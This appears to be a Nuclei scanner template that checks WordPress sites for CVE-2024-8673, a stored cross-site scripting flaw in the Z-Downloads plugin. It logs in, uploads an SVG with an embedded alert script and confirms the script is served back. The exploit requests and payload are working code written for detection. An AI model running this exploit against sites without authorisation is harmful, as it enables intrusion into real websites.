id: CVE-2024-8673

info:
  name: Z-Downloads < 1.11.7 - Cross-Site Scripting
  author: Splint3r7
  severity: low
  description: |
    The plugin does not properly validate uploaded files allowing for the uploading of SVGs containing malicious JavaScript.
  remediation: Fixed in version 1.11.7
  reference:
    - https://wpscan.com/vulnerability/fed2cd26-7ccb-419d-b589-978410953bf4/
  classification:
    cve-id: CVE-2024-8673
    cvss-score: 3.5
    cwe-id: CWE-79
  metadata:
    verified: true
    max-request: 5
    framework: wordpress
  tags: cve,cve2024,wpscan,wp-plugin,wp,authenticated,wordpress,z-downloads

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&&wp-submit=Log+In&testcookie=1

      - |
        GET /wp-admin/admin.php?page=z-downloads-add-file HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: nonce
        group: 1
        regex:
          - name="nonce" value="([0-9a-zA-Z]+)"
        internal: true

  - raw:
      - |
        POST /wp-admin/admin.php?page=z-downloads-files HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=---------------------------191511049038951322013765412437

        -----------------------------191511049038951322013765412437
        Content-Disposition: form-data; name="file"; filename="xss.svg"
        Content-Type: image/svg+xml

        <svg xmlns="http://www.w3.org/2000/svg">
        <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
        <script type="text/javascript">alert(document.domain);</script>
        </svg>

        -----------------------------191511049038951322013765412437
        Content-Disposition: form-data; name="nonce"

        {{nonce}}
        -----------------------------191511049038951322013765412437
        Content-Disposition: form-data; name="submit"

        Upload
        -----------------------------191511049038951322013765412437--

      - |
        GET /wp-admin/admin.php?page=z-downloads-files HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /{{payloadurl}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code_5 == 200
          - contains(content_type_5, "image/svg+xml")
          - contains(body_5, "<script type=\"text/javascript\">alert(document.domain);</script>")
        condition: and

    extractors:
      - type: regex
        name: payloadurl
        part: body
        regex:
          - /wp-content/uploads/z-downloads-[a-f0-9]{32}/files/[a-f0-9]{32}/xss\.svg
        internal: true
# digest: 4a0a0047304502210083c2fe7553783b849d50e6dab965960281be09ac3411decaf55d17fd25e65dfe022005f44e04448f8037b6b5ca6e5d86f36fc3584b5afa10acca85bdc84ea7ebe94c:922c64590222798bb761d5b6d8e72950